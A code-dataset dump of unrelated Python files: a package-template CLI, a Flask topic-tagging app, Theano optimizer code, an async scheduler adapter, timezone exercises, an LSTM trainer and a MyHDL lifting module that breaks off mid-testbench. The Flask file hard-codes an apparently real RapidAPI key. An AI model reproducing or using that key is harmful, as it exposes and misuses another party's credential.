text stringlengths 8 6.05M |
|---|
import argparse
from common import *
def main(directory, template, overwrite):
    """
    Copies the default_package to the directory passed in, the environment
    variable PKG_ROOT_DIRECTORY or the current working directory.

    :param directory: Directory to create for this package
    :param template: Path to the template package to be used
    :param overwrite: Set to True to remove directory if it exists
    :return: Generates a folder on disk at 'directory'
    """
    # Resolve the destination directory from the argument, the env var or the
    # cwd (helper comes in via ``from common import *``).
    destination_dir = get_package_root(directory)
    # NOTE(review): presumably copies `template` into destination_dir,
    # honouring `overwrite` -- confirm in common.make_dir.
    make_dir(destination_dir, template, overwrite)
# Command-line interface for the package creator.
parser = argparse.ArgumentParser()
parser.add_argument('-d',
                    '--directory',
                    help="""Root directory to create for this package. You can
                    also set the PKG_ROOT_DIRECTORY environment variable. This
                    directory must be an absolute path.""",
                    required=False,
                    default=None)
parser.add_argument('-t',
                    '--template',
                    help='Template package to use when creating a new package',
                    required=True)
# BUG FIX: with nargs='?' and no const=, a bare "-o" stored None and silently
# disabled overwriting.  const=True makes a bare "-o" mean overwrite; the
# plain-bool default also avoids running str2bool on a default string.
parser.add_argument('-o',
                    '--overwrite',
                    help='Set to True to remove "directory" if it exists',
                    type=str2bool,
                    nargs='?',
                    const=True,
                    required=False,
                    default=False)

if __name__ == '__main__':
    args = parser.parse_args()
    main(args.directory, args.template, args.overwrite)
|
from flask import Flask,render_template,request
import numpy as np
import re
import requests
import json
import csv
import pandas as pd
app = Flask(__name__)
def check(output):
    """Query the Twinword topic-tagging API and return its topic mapping.

    :param output: text to tag
    :return: the ``topic`` entry of the JSON response
    """
    # NOTE(review): the URL host and the x-rapidapi-host header disagree
    # (rapidapi.p.rapidapi.com vs twinword-topic-tagging.p.rapidapi.com) --
    # confirm which endpoint is intended.
    url = "https://rapidapi.p.rapidapi.com/generate/"
    payload = {"text": output}
    #print(payload)
    # SECURITY: a live API key is hard-coded in source.  Move it to an
    # environment variable / config file and rotate the exposed key.
    headers = {
        'x-rapidapi-key': "537649ff73msh477f6855911bb13p129cf4jsnd5cb001617b2",
        'x-rapidapi-host': "twinword-topic-tagging.p.rapidapi.com"
    }
    response = requests.request("GET", url, headers=headers, params=payload)
    print(response.text)
    return response.json()["topic"]
    #return var
@app.route("/")
def home():
    """Render the landing page."""
    return render_template('home.html')
@app.route("/summarizer")
def summarizer():
    """Render the form page where the user submits text to be tagged."""
    return render_template('summarizer.html')
@app.route("/summarize",methods=["POST"])
def summarize():
    """Handle the summarizer form: tag the text, dump topic/probability pairs
    to CSV and render them as a table.

    Reads the ``output`` form field, currently loads topics from sample.json
    (the live API call is commented out), and renders summary.html with the
    resulting records and column names.
    """
    output = request.form['output']
    # Keep only letters, periods and commas; everything else becomes a space.
    output = re.sub(r'[^a-zA-Z.,]', " ", output)
    print(output)
    #essay = check(output) # API call
    with open('sample.json') as json_file:  # Test using sample json
        essay = json.load(json_file)
    # newline='' prevents the csv module from emitting blank rows on Windows;
    # the context managers also fix the leaked file handle of the original.
    with open('data_file.csv', 'w', newline='') as data_file:
        csv_writer = csv.writer(data_file)
        csv_writer.writerow(["Type", "Probability"])
        for emp in essay:
            essay[emp] = round(essay[emp], 4)
            csv_writer.writerow([emp, essay[emp]])
    # Round-trip through pandas to hand the template a list of row dicts.
    df = pd.read_csv('data_file.csv')
    temp = df.to_dict('records')
    colname = df.columns.values
    return render_template('summary.html', records=temp, colnames=colname)
if __name__=="__main__":
    # Development server only -- use a proper WSGI server in production.
    app.run('localhost',5000,debug=True)
|
from .utils.nnet_named import NamedGradientStatus
from .utils.nnet import symbolic_variable_for_dimension
from numpy import array
import theano, theano.tensor as T, numpy as np
from collections import OrderedDict
REAL = theano.config.floatX
class GradientModel(object):
    """
    A gradient model for updating your model with
    hessian free, adagrad, or linear decay updates.

    You will need to define the following attributes,
    and fill them as appropriate:

        # a forward method for getting errors:
        projection = self.projection_function(ivector <indices/>)

        # a cost function (that takes the result of projection function and labels as input)
        # and returns a symbolic differentiable theano variable
        self.cost_function(projection, ivector <label/>).sum()

        self.params = []
        self.indexed_params = set()
        self._l2_regularization = True / False
        self.store_max_updates = True / False

        # set this theano setting
        self.theano_mode = "FAST_RUN"

        # set this theano setting
        self.disconnected_inputs = 'ignore' / None

        # if L2 is true store this parameter:
        self._l2_regularization_parameter = theano.shared(np.float64(l2_regularization).astype(REAL), name='l2_regularization_parameter')

    Upon initialization you must run:

        self._select_update_mechanism(update_method_name)
        # then to compile this mechanism:
        self.create_update_fun()

    The update methods expect the input to be of the form:

        ivector <indices/>, ivector <labels/>

    If this is not the case you can modify them as appropriate.
    """

    def alternate_gradients_fun(self, params, example):
        """Gradients evaluated at alternate parameter values; subclass hook."""
        raise NotImplementedError()

    def loss_fun(self, examples):
        """Loss over a set of examples; subclass hook."""
        raise NotImplementedError()

    def gradients_fun(self, example):
        """Gradients for a single example; subclass hook."""
        raise NotImplementedError()

    def create_update_mechanisms(self):
        """Compile one theano function per parameter that applies
        ``param += -grad_update * learning_rate`` (reshaped to the parameter's
        shape; 0-d parameters take the first vector element)."""
        self.update_mechanisms = {}
        # cache of each parameter's numpy shape, used by (un)ravel helpers:
        self._param_shapes = {}
        grad_update = theano.tensor.vector('grad_update')
        learning_rate = theano.tensor.vector('learning_rate')
        mixed_rate = -grad_update * learning_rate
        for param in self.params:
            shape = param.get_value(borrow = True).shape
            self._param_shapes[param] = shape
            self.update_mechanisms[param] = theano.function([grad_update, learning_rate],
                updates = (
                    {param: param + mixed_rate.reshape(shape)} if len(shape) > 0 else {param: param + mixed_rate[0]}) )

    def get_parameter(self, param):
        """
        Get the value of a parameter.

        Inputs:
        -------
        param: the parameter.

        Outputs:
        --------
        ndarray with the underlying parameter value.
        """
        return param.get_value(borrow = True)

    def update_parameter(self, param, grad, learning_rate):
        """
        Make updates to parametes, either the tensors, matrices, or the
        vocabulary.

        Inputs:
        -------
        param: the parameter.
        grad: the ndarray of the gradient for the error of this parameter
        learning_rate: the per dimension learning rate for this grad (i.e.
                       len(grad) == len(learning_rate))
        """
        self.update_mechanisms[param](grad, learning_rate)

    def unravel_parameter(self, param, vector):
        """
        Reconvert parameter from its vectorized shape to its
        structured tensor or matrix shape.

        Inputs:
        -------
        param: the underlying parameter
        vector: the vectorized form of the parameter

        Outputs:
        -------
        ndarray with shape equal to the parameter's and the
        contents of vector.
        """
        return vector.reshape(self._param_shapes[param])

    def gradients(model):
        # NOTE(review): the first parameter is named `model` but receives the
        # instance (it plays the role of `self`).
        gradients = NamedGradientStatus()
        gradients.add_symbolic_variables(model.params)
        return gradients

    def ravel_gradient(self, param, gradients):
        """
        Convert parameter from its original shape to a
        vectorized form.

        Inputs:
        -------
        param: the underlying parameter (Theano SharedVariable)
        gradients: the NamedGradientStatus object containing
                   gradient updates.

        Outputs:
        -------
        ndarray vector ndim == 1 and the
        contents of appropriate gradient update.
        """
        return gradients[param].ravel()

    def ravel_gradients(self, param, gradients):
        # NOTE(review): each element of `gradients` is passed as the
        # NamedGradientStatus argument of ravel_gradient -- confirm callers
        # pass a sequence of gradient-status objects here.
        return array([self.ravel_gradient(param, grad) for grad in gradients])

    def _skip_update_param(self, parameter):
        """
        Whether to update this parameter given the current
        parametrization of the model.  Default: never skip.
        """
        return False

    def _create_linear_batch_update_mechanism(self):
        """Compile batched SGD update/gradient/prediction functions built on
        batch_projection_function and batch_cost_function."""
        indices = T.ivector('indices')
        index_length = T.ivector('indices_length')
        label = T.ivector('labels')
        multi_class_projections = self.batch_projection_function(indices, index_length)
        batch_cost = self.batch_cost_function(multi_class_projections, label).mean()
        batch_gparams = T.grad(batch_cost, self.params, disconnected_inputs = self.disconnected_inputs )
        batch_updates = OrderedDict()
        for param, gparam in zip(self.params, batch_gparams):
            if self._skip_update_param(param):
                continue
            if param in self.indexed_params:
                # indexed (embedding-like) parameters only update touched rows:
                batch_updates[param] = T.inc_subtensor(param[indices], - self.learning_rate * gparam[indices])
            else:
                batch_updates[param] = param - self.learning_rate * gparam
        self.batch_update_fun = theano.function([indices, index_length, label], batch_cost, updates = batch_updates, mode = self.theano_mode)
        self.batch_gradient_fun = theano.function([indices, index_length, label], batch_gparams, mode = self.theano_mode)
        self.predict_batch_proba = theano.function([indices, index_length], multi_class_projections, mode = self.theano_mode)
        self.predict_batch = theano.function([indices, index_length], multi_class_projections.argmax(axis=0), mode = self.theano_mode)

    def l2_regularization(self, indices):
        """Symbolic L2 penalty over all parameters; indexed parameters are
        only penalized on the rows selected by `indices`."""
        costs = []
        for param in self.params:
            if param in self.indexed_params:
                costs.append(self._l2_regularization_parameter * (param[indices] ** 2).sum())
            else:
                costs.append(self._l2_regularization_parameter * (param ** 2).sum())
        return sum(costs)

    def _create_linear_update_mechanism(self):
        """Compile plain SGD update/gradient functions (optionally with L2),
        plus an alternate-parameter gradient function used for hessian
        approximations; also builds batch variants when requested."""
        indices = T.ivector('indices')
        label = T.ivector('labels')
        class_projection = self.projection_function(indices)
        cost = self.cost_function(class_projection, label).sum()
        if self._l2_regularization:
            cost += self.l2_regularization(indices)
        gparams = T.grad(cost, self.params, disconnected_inputs = self.disconnected_inputs)
        updates = OrderedDict()
        for param, gparam in zip(self.params, gparams):
            if self._skip_update_param(param):
                continue
            if param in self.indexed_params:
                updates[param] = T.inc_subtensor(param[indices], - self.learning_rate * gparam[indices])
            else:
                updates[param] = param - self.learning_rate * gparam
        self.update_fun = theano.function([indices, label], cost, updates = updates, mode = self.theano_mode)
        self.gradient_fun = theano.function([indices, label], gparams, mode = self.theano_mode)
        # to compute hessian approximations, we use alternate gradient:
        # the gradient graph is re-evaluated with stand-in inputs substituted
        # for the shared parameters via `givens`.
        alt_params = [symbolic_variable_for_dimension(param.ndim) for param in self.params]
        givens = OrderedDict()
        for param, alt_param in zip(self.params, alt_params):
            givens[param] = alt_param
        self.alternate_gradient_fun = theano.function([indices, label] + alt_params, gparams, givens = givens, mode = self.theano_mode)
        if self.create_batch_methods:
            self._create_linear_batch_update_mechanism()

    def _create_clipped_update_mechanism(self):
        """SGD with gradients clipped to [-clip_range, clip_range]; also
        tracks the largest raw gradient per parameter in max_update_size."""
        self.max_update_size = theano.shared(np.zeros(len(self.params), dtype=REAL), 'max_update_size')
        self.clip_range = theano.shared(np.float32(10))
        indices = T.ivector('indices')
        label = T.ivector('labels')
        class_projection = self.projection_function(indices)
        cost = self.cost_function(class_projection, label).sum()
        gparams = T.grad(cost, self.params, disconnected_inputs = self.disconnected_inputs )
        updates = OrderedDict()
        i = 0
        updates[self.max_update_size] = self.max_update_size
        for param, gparam in zip(self.params, gparams):
            if self._skip_update_param(param):
                continue
            if param in self.indexed_params:
                # record the max *unclipped* gradient before clipping:
                updates[self.max_update_size] = T.set_subtensor(updates[self.max_update_size][i], T.maximum(self.max_update_size[i], gparam[indices].max()))
                gparam = T.clip(gparam[indices], -self.clip_range, self.clip_range)
                updates[param] = T.inc_subtensor(param[indices], - self.learning_rate * gparam)
            else:
                updates[self.max_update_size] = T.set_subtensor(updates[self.max_update_size][i], T.maximum(self.max_update_size[i], gparam.max()))
                gparam = T.clip(gparam, -self.clip_range, self.clip_range)
                updates[param] = param - self.learning_rate * gparam
            i+=1
        self.update_fun = theano.function([indices, label], cost, updates = updates, mode = self.theano_mode)

    def _create_clipped_adagrad_update_mechanism(self):
        """Adagrad with clipping: per-parameter squared-gradient statistics
        normalize the learning rate; reset_adagrad restores them to ones."""
        if self.store_max_updates:
            self.max_update_size = theano.shared(np.zeros(len(self.params), dtype=REAL), 'max_update_size')
        # accumulated squared gradients (initialized to ones) per parameter:
        self._additional_params = {}
        for param in self.params:
            self._additional_params[param] = theano.shared(np.ones_like(param.get_value(borrow=True)), name="%s_statistic" % (param.name))
        self.clip_range = theano.shared(np.float32(10))
        indices = T.ivector('indices')
        label = T.ivector('labels')
        class_projection = self.projection_function(indices)
        cost = self.cost_function(class_projection, label).sum()
        if self._l2_regularization:
            cost += self.l2_regularization(indices)
        gparams = T.grad(cost, self.params, disconnected_inputs = self.disconnected_inputs )
        updates = OrderedDict()
        reset_updates = OrderedDict()
        i = 0
        if self.store_max_updates:
            updates[self.max_update_size] = self.max_update_size
        for param, gparam in zip(self.params, gparams):
            if self._skip_update_param(param):
                continue
            if param in self.indexed_params:
                # the statistic gets increased by the squared gradient:
                updates[self._additional_params[param]] = T.inc_subtensor(self._additional_params[param][indices], gparam[indices] ** 2)
                reset_updates[self._additional_params[param]] = T.ones_like(self._additional_params[param])
                if self.store_max_updates:
                    updates[self.max_update_size] = T.set_subtensor(updates[self.max_update_size][i], T.maximum(self.max_update_size[i], gparam[indices].max()))
                gparam = T.clip(gparam[indices], -self.clip_range, self.clip_range)
                # this normalizes the learning rate:
                updates[param] = T.inc_subtensor(param[indices], - (self.learning_rate / T.sqrt(updates[self._additional_params[param]][indices])) * gparam)
            else:
                # the statistic gets increased by the squared gradient:
                updates[self._additional_params[param]] = self._additional_params[param] + (gparam ** 2)
                reset_updates[self._additional_params[param]] = T.ones_like(self._additional_params[param])
                if self.store_max_updates:
                    updates[self.max_update_size] = T.set_subtensor(updates[self.max_update_size][i], T.maximum(self.max_update_size[i], gparam.max()))
                gparam = T.clip(gparam, -self.clip_range, self.clip_range)
                # this normalizes the learning rate:
                updates[param] = param - (self.learning_rate / T.sqrt(updates[self._additional_params[param]])) * gparam
            i+=1
        self.update_fun = theano.function([indices, label], cost, updates = updates, mode = self.theano_mode)
        self.reset_adagrad = theano.function([], updates = reset_updates, mode = self.theano_mode)

    def _create_exterior_update_mechanism(self):
        """Compile the per-parameter mechanisms plus the linear functions so
        an external optimizer can drive the updates."""
        self.create_update_mechanisms()
        self._create_linear_update_mechanism()

    def _select_update_mechanism(self, update_function_name):
        """
        Choose among these update mechanisms:

            'hessian' : hessian-free updates,
            'linear' : linear decay,
            'clipped' : clipped strategy.
            'exterior' : created gradient_fun,
                         alternate_gradient_fun, &
                         loss_fun, to power external
                         optimizers.
        """
        update_function_name = update_function_name.lower()
        if update_function_name == 'hessian':
            # NOTE(review): _create_hessian_update_mechanism is not defined in
            # this class -- it must be supplied by a subclass.
            self.create_update_fun = self._create_hessian_update_mechanism
        elif update_function_name == 'linear':
            self.create_update_fun = self._create_linear_update_mechanism
        elif update_function_name == 'clipped':
            self.create_update_fun = self._create_clipped_update_mechanism
        elif update_function_name == 'adagradclipped' or update_function_name == 'clippedadagrad':
            self.create_update_fun = self._create_clipped_adagrad_update_mechanism
        elif update_function_name == 'exterior':
            self.create_update_fun = self._create_exterior_update_mechanism
        else:
            raise NotImplementedError
from __future__ import annotations
from contextlib import AsyncExitStack
from datetime import datetime
from functools import partial
from typing import Iterable
from uuid import UUID
import attrs
from anyio import to_thread
from anyio.from_thread import BlockingPortal
from ..abc import AsyncDataStore, AsyncEventBroker, DataStore, EventSource
from ..enums import ConflictPolicy
from ..eventbrokers.async_adapter import AsyncEventBrokerAdapter
from ..structures import Job, JobResult, Schedule, Task
from ..util import reentrant
@reentrant
@attrs.define(eq=False)
class AsyncDataStoreAdapter(AsyncDataStore):
    """Adapt a synchronous DataStore to the AsyncDataStore interface by
    running every blocking call in a worker thread via anyio.to_thread."""

    # the wrapped synchronous data store
    original: DataStore
    # portal that lets worker-thread code call back into the event loop
    _portal: BlockingPortal = attrs.field(init=False)
    _events: AsyncEventBroker = attrs.field(init=False)
    _exit_stack: AsyncExitStack = attrs.field(init=False)

    @property
    def events(self) -> EventSource:
        """Async view of the wrapped store's event source."""
        return self._events

    async def __aenter__(self) -> AsyncDataStoreAdapter:
        # Enter portal, event-broker adapter and the sync store (in a thread);
        # the exit stack tears them down in reverse order.
        self._exit_stack = AsyncExitStack()
        self._portal = BlockingPortal()
        await self._exit_stack.enter_async_context(self._portal)
        self._events = AsyncEventBrokerAdapter(self.original.events, self._portal)
        await self._exit_stack.enter_async_context(self._events)
        await to_thread.run_sync(self.original.__enter__)
        self._exit_stack.push_async_exit(partial(to_thread.run_sync, self.original.__exit__))
        return self

    async def __aexit__(self, exc_type, exc_val, exc_tb):
        await self._exit_stack.__aexit__(exc_type, exc_val, exc_tb)

    # The methods below each delegate one DataStore call to a worker thread.

    async def add_task(self, task: Task) -> None:
        await to_thread.run_sync(self.original.add_task, task)

    async def remove_task(self, task_id: str) -> None:
        await to_thread.run_sync(self.original.remove_task, task_id)

    async def get_task(self, task_id: str) -> Task:
        return await to_thread.run_sync(self.original.get_task, task_id)

    async def get_tasks(self) -> list[Task]:
        return await to_thread.run_sync(self.original.get_tasks)

    async def get_schedules(self, ids: set[str] | None = None) -> list[Schedule]:
        return await to_thread.run_sync(self.original.get_schedules, ids)

    async def add_schedule(self, schedule: Schedule, conflict_policy: ConflictPolicy) -> None:
        await to_thread.run_sync(self.original.add_schedule, schedule, conflict_policy)

    async def remove_schedules(self, ids: Iterable[str]) -> None:
        await to_thread.run_sync(self.original.remove_schedules, ids)

    async def acquire_schedules(self, scheduler_id: str, limit: int) -> list[Schedule]:
        return await to_thread.run_sync(self.original.acquire_schedules, scheduler_id, limit)

    async def release_schedules(self, scheduler_id: str, schedules: list[Schedule]) -> None:
        await to_thread.run_sync(self.original.release_schedules, scheduler_id, schedules)

    async def get_next_schedule_run_time(self) -> datetime | None:
        return await to_thread.run_sync(self.original.get_next_schedule_run_time)

    async def add_job(self, job: Job) -> None:
        await to_thread.run_sync(self.original.add_job, job)

    async def get_jobs(self, ids: Iterable[UUID] | None = None) -> list[Job]:
        return await to_thread.run_sync(self.original.get_jobs, ids)

    async def acquire_jobs(self, worker_id: str, limit: int | None = None) -> list[Job]:
        return await to_thread.run_sync(self.original.acquire_jobs, worker_id, limit)

    async def release_job(self, worker_id: str, task_id: str, result: JobResult) -> None:
        await to_thread.run_sync(self.original.release_job, worker_id, task_id, result)

    async def get_job_result(self, job_id: UUID) -> JobResult | None:
        return await to_thread.run_sync(self.original.get_job_result, job_id)
|
from jnius import autoclass, JavaException
import sys

# NOTE(review): Python 2 syntax (print statements) -- this script will not run
# under Python 3 without converting the prints to function calls.
# Demonstrate calling a Java class (PyJNIusExample) from Python via pyjnius.
PyJNIusExample = autoclass("PyJNIusExample")
pyJNIusExample = PyJNIusExample()
print "Calling instantiated addNumbers... The result is %d"%pyJNIusExample.addNumbers(13,1,20,8)
print "Calling instantiated addition... The result is %d"%pyJNIusExample.addition(13,1,20,8)
print "Calling static addition... The result is %d"%PyJNIusExample.addition(13,1,20,8)
print "----------"
print "And now let's look at some error cases"
# Re-bind the names to the error-demonstration Java class.
PyJNIusExample = autoclass("PyJNIusExampleErrors")
pyJNIusExample = PyJNIusExample()
print "Calling addition on the static class with integers results in: %d"%PyJNIusExample.addition(13,1,20,8)
print "Calling addition on the static class with a String results in: %s"%PyJNIusExample.addition("Hello World")
print "Calling addition on intantiated class..."
# exception handling does not yield the same result as letting the exception fly:
# the message "No methods matching your arguments" is not exactly "jnius.JavaMultipleMethod"
pyJNIusExample.addition(13,1,20,8)
|
# Time Zones and Daylight Saving!!
# In this chapter, you'll learn to confidently tackle the time-related topic that causes people the most trouble: time zones and daylight saving. Continuing with our bike data, you'll learn how to compare clocks around the world, how to gracefully handle "spring forward" and "fall back," and how to get up-to-date timezone data from the dateutil library.
# Creating timezone aware datetimes
# In this exercise, you will practice setting timezones manually.
# # Import datetime, timezone
# from datetime import datetime, timezone
# # October 1, 2017 at 15:26:26, UTC
# dt = datetime(2017, 10, 1, 15, 26, 26, tzinfo= timezone.utc)
# # Print results
# print(dt.isoformat())
# Setting timezones
# Now that you have the hang of setting timezones one at a time, let's look at setting them for the first ten trips that W20529 took.
# timezone and timedelta have already been imported. Make the change using .replace()
# Create a timezone object corresponding to UTC-4
# Create a fixed-offset timezone object corresponding to UTC-4 (US EDT).
# NOTE(review): `timezone`, `timedelta` and `onebike_datetimes` are supplied
# by the exercise environment -- they are not defined in this file.
edt = timezone(timedelta(hours = -4))

# Loop over trips, updating the start and end datetimes to be in UTC-4
for trip in onebike_datetimes[:10]:
    # Update trip['start'] and trip['end'] (replace() attaches the tzinfo
    # without shifting the clock time)
    trip['start'] = trip['start'].replace(tzinfo = edt)
    trip['end'] = trip['end'].replace(tzinfo = edt)
# What time did the bike leave in UTC?
# Having set the timezone for the first ten rides that W20529 took, let's see what time the bike left in UTC. We've already loaded the results of the previous exercise into memory.
# Loop over the trips
for trip in onebike_datetimes[:10]:
    # Pull out the start and convert it to UTC (astimezone shifts the clock,
    # unlike replace)
    dt = trip['start'].astimezone(timezone.utc)
    # Print the start time in UTC
    print('Original:', trip['start'], '| UTC:', dt.isoformat())
# Putting the bike trips into the right time zone
# Instead of setting the timezones for W20529 by hand, let's assign them to their IANA timezone: 'America/New_York'. Since we know their political jurisdiction, we don't need to look up their UTC offset. Python will do that for us.
# Import tz
from dateutil import tz

# Create a timezone object for Eastern Time; the IANA zone handles DST
# transitions automatically, unlike a fixed UTC offset.
et = tz.gettz('America/New_York')

# Loop over trips, updating the datetimes to be in Eastern Time
for trip in onebike_datetimes[:10]:
    # Update trip['start'] and trip['end']
    trip['start'] = trip['start'].replace(tzinfo = et)
    trip['end'] = trip['end'].replace(tzinfo = et)
# What time did the bike leave? (Global edition)
# When you need to move a datetime from one timezone into another, use .astimezone() and tz. Often you will be moving things into UTC, but for fun let's try moving things from 'America/New_York' into a few different time zones.
# Create the timezone object
# Create the timezone object for the UK
uk = tz.gettz('Europe/London')

# Pull out the start of the first trip
local = onebike_datetimes[0]['start']

# What time was it in the UK?  astimezone converts between zones.
notlocal = local.astimezone(uk)

# Print them out and see the difference
print(local.isoformat())
print(notlocal.isoformat())
# How many hours elapsed around daylight saving?
# Since our bike data takes place in the fall, you'll have to do something else to learn about the start of daylight savings time.
# Let's look at March 12, 2017, in the Eastern United States, when Daylight Saving kicked in at 2 AM.
# If you create a datetime for midnight that night, and add 6 hours to it, how much time will have elapsed?
# # Import datetime, timedelta, tz, timezone
# from datetime import datetime, timedelta, timezone
# from dateutil import tz
# # Start on March 12, 2017, midnight, then add 6 hours
# start = datetime(2017, 3, 12, tzinfo = tz.gettz('America/New_York'))
# end = start + timedelta(hours = 6)
# print(start.isoformat() + " to " + end.isoformat())
# March 29, throughout a decade
# Daylight Saving rules are complicated: they're different in different places, they change over time, and they usually start on a Sunday (and so they move around the calendar).
# For example, in the United Kingdom, as of the time this lesson was written, Daylight Saving begins on the last Sunday in March. Let's look at the UTC offset for March 29, at midnight, for the years 2000 to 2010.
# Import datetime and tz
from datetime import datetime
from dateutil import tz

# Create starting date: March 29, midnight, London time
dt = datetime(2000, 3, 29, tzinfo = tz.gettz('Europe/London'))

# Loop over the years 2000-2010, replacing the year, and print the ISO
# timestamp -- the UTC offset shows whether DST was in effect that year.
for y in range(2000, 2011):
    print(dt.replace(year=y).isoformat())
# Finding ambiguous datetimes
# At the end of lesson 2, we saw something anomalous in our bike trip duration data. Let's see if we can identify what the problem might be.
# The data has been loaded as onebike_datetimes, and tz has already been imported from dateutil.
# Loop over trips
for trip in onebike_datetimes:
    # Rides with ambiguous start (wall-clock time that occurs twice when
    # clocks fall back)
    if tz.datetime_ambiguous(trip['start']):
        print("Ambiguous start at " + str(trip['start']))
    # Rides with ambiguous end
    if tz.datetime_ambiguous(trip['end']):
        print("Ambiguous end at " + str(trip['end']))
# Cleaning daylight saving data with fold
# As we've just discovered, there is a ride in our data set which is being messed up by a Daylight Savings shift. Let's clean up the data set so we actually have a correct minimum ride length. We can use the fact that we know the end of the ride happened after the beginning to fix up the duration messed up by the shift out of Daylight Savings.
# Since Python does not handle tz.enfold() when doing arithmetic, we must put our datetime objects into UTC, where ambiguities have been resolved.
# onebike_datetimes is already loaded and in the right timezone. tz and timezone have been imported. Use tz.UTC for your timezone.
trip_durations = []
for trip in onebike_datetimes:
    # When the start is later than the end, the end fell in the repeated
    # DST hour: set its fold to 1 (second occurrence of that wall time)
    if trip['start'] > trip['end']:
        trip['end'] = tz.enfold(trip['end'])
    # Convert to UTC, where fold ambiguities are resolved
    start = trip['start'].astimezone(timezone.utc)
    end = trip['end'].astimezone(timezone.utc)
    # Subtract the difference
    trip_length_seconds = (end-start).total_seconds()
    trip_durations.append(trip_length_seconds)

# Take the shortest trip duration
print("Shortest trip: " + str(min(trip_durations)))
|
import sys
sys.path.append('..')
import uuid
from src.database_tools.DatabaseAdapter import DatabaseAdapter
from src.entities.Temperature import Temperature
from datetime import datetime
class TemperatureDataService():
    """Data-access service for temperature records in the ``temperature``
    table, backed by a DatabaseAdapter."""

    # constructor:
    def __init__(self):
        self.__tableName = "temperature"
        self.__databaseAdapter = DatabaseAdapter(self.__tableName)

    # private methods:
    def __ParseTemperatureResult(self, row):
        """Map a database row (id, timestamp, value) to a Temperature entity."""
        itemId = row[0]
        timeStamp = row[1]
        value = row[2]
        temperature = Temperature(itemId, timeStamp, value)
        return temperature

    # public methods:
    def GetById(self, itemId):
        """Fetch one row by id and return it as a Temperature entity."""
        result = self.__databaseAdapter.Select(itemId)
        temperature = self.__ParseTemperatureResult(result)
        return temperature

    def GetAll(self):
        """Return every row of the table as a list of Temperature entities."""
        results = self.__databaseAdapter.SelectAll()
        temperatures = []
        for res in results:
            temperatures.append(self.__ParseTemperatureResult(res))
        return temperatures

    def Save(self, temperatureItem):
        """Insert the item; the nil UUID (all zeros) marks a new record, which
        gets a fresh uuid4.

        NOTE(review): the generated id is not written back to temperatureItem,
        so callers cannot learn the id of a newly saved record -- confirm this
        is intended.
        """
        if(temperatureItem.Id == uuid.UUID(int=0)):
            itemId = uuid.uuid4()
        else:
            itemId = temperatureItem.Id
        self.__databaseAdapter.Insert((str(itemId), temperatureItem.TimeStamp, temperatureItem.Value))
|
import utils
import lstm as net
import argparse
import os
import torch
import torch.nn.functional as F
import torch.optim as optim
import data_loader
from sklearn.metrics import accuracy_score
# Command-line interface for the LSTM classifier training run.
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument('--embedding_file', default='data/balanced/embs/tokens.txt',
                        help='Directory containing file with embeddings')
arg_parser.add_argument('--model_name', default='colf_classifier.pt',
                        help='Name of the saved model')
arg_parser.add_argument('--data_dir', default='data/balanced',
                        help='Directory containing the data and dataset parameters')
arg_parser.add_argument('--param_dir', default='experiments/base_model',
                        help='Directory containing hyperparameters')

if __name__ == '__main__':
    args = arg_parser.parse_args()
    path_embedding_file = args.embedding_file
    model_name = args.model_name
    data_dir = args.data_dir
    params_dir = args.param_dir
    # Load dataset parameters and merge in the experiment hyperparameters.
    params = utils.Params(os.path.join(data_dir, 'dataset_params.json'))
    params.update(os.path.join(params_dir, 'params.json'))
    # BUG FIX: honour --data_dir; the original hard-coded 'data/balanced'
    # here, silently ignoring the CLI argument.
    dl = data_loader.DataLoader(data_dir, params)
    data = dl.load_data(['train'], data_dir)
    pretrained_weights = utils.load_embeddings_from_txt(dl.feature_map,
                                                        path_embedding_file)
    # Renamed from `net` so the `lstm as net` module import is not shadowed.
    model = net.Network(params, pretrained_weights)
    optimizer = optim.Adam(model.parameters(), lr=params.learning_rate)
    for epoch in range(params.num_epochs):
        data_iter = dl.data_iterator(data['train'], params, shuffle=True)
        total_loss = 0
        total_correct = 0
        # Training loop: forward, loss, backprop, step for each batch.
        for batch in data_iter:
            sents, labels = batch
            preds, single_labels = model(sents, labels)
            loss = F.cross_entropy(preds, single_labels)
            optimizer.zero_grad()
            loss.backward()
            optimizer.step()
            total_loss += loss.item()
            total_correct += model.get_num_correct(preds, single_labels)
        print("epoch: ", epoch + 1, "total_correct: ", total_correct, "total_loss: ", total_loss, flush=True)
    torch.save(model.state_dict(), model_name)
# In Python 3 the '#' comment syntax is unchanged from Python 2.
print("have to do this parentheses now")  # print is a function in Python 3, so parentheses are required
# print("block this VIM!")
|
from myhdl import *
import argparse
# Data-path width in bits for the sample inputs.
W0 = 9
# 3-bit control flags selecting the lifting operation (decoded in lift_step).
flags_i = Signal(intbv(0)[3:])
left_i = Signal(intbv(0)[W0:])    # left neighbour sample
right_i = Signal(intbv(0)[W0:])   # right neighbour sample
sam_i = Signal(intbv(0)[W0:])     # centre sample
clk_i = Signal(bool(0))           # clock
update_i = Signal(bool(0))        # start/strobe input
update_o = Signal(bool(0))        # done/idle output
# Signed result covering the full two's-complement range of W0+1 bits.
res_o = Signal(intbv(0, min=-(2**(W0)), max=(2**(W0))))
def cliparse():
    """Parse the command-line flags selecting build/test/convert actions.

    :return: argparse.Namespace with boolean attributes build, test, convert
    """
    cli = argparse.ArgumentParser()
    for flag in ("--build", "--test", "--convert"):
        cli.add_argument(flag, default=False, action='store_true')
    return cli.parse_args()
def lift_step(flags_i, update_i, left_i, sam_i, right_i, res_o, update_o, clk_i):
    """Clocked lifting step: when update_i is asserted, combine sam_i with its
    neighbours according to flags_i and drive res_o; otherwise raise update_o.

    NOTE(review): the four flag encodings (7/5: sample -/+ averaged halves,
    6/4: sample +/- rounded quarter sum) look like 5/3 wavelet lifting
    predict/update steps -- confirm against the design spec.
    """
    @always(clk_i.posedge)
    def rtl ():
        if (update_i == 1):
            # busy: deassert the done flag while computing
            update_o.next = 0
            if (flags_i == 7):
                res_o.next = sam_i.signed() - ((left_i.signed() >> 1) + (right_i.signed() >> 1))
            elif (flags_i == 5):
                res_o.next = sam_i.signed() + ((left_i.signed() >> 1) + (right_i.signed() >> 1))
            elif (flags_i == 6):
                res_o.next = sam_i.signed() + ((left_i.signed() + right_i.signed() + 2) >> 2 )
            elif (flags_i == 4):
                res_o.next = sam_i.signed() - ((left_i.signed() + right_i.signed() + 2) >> 2 )
        else:
            update_o.next = 1
    return rtl
def tb(flags_i, update_i, left_i, sam_i, right_i, res_o, update_o, clk_i):
    """Testbench: generate a 20 ns clock, load sample values, pulse update_i
    with flags=7 and print the lifting result before stopping simulation."""
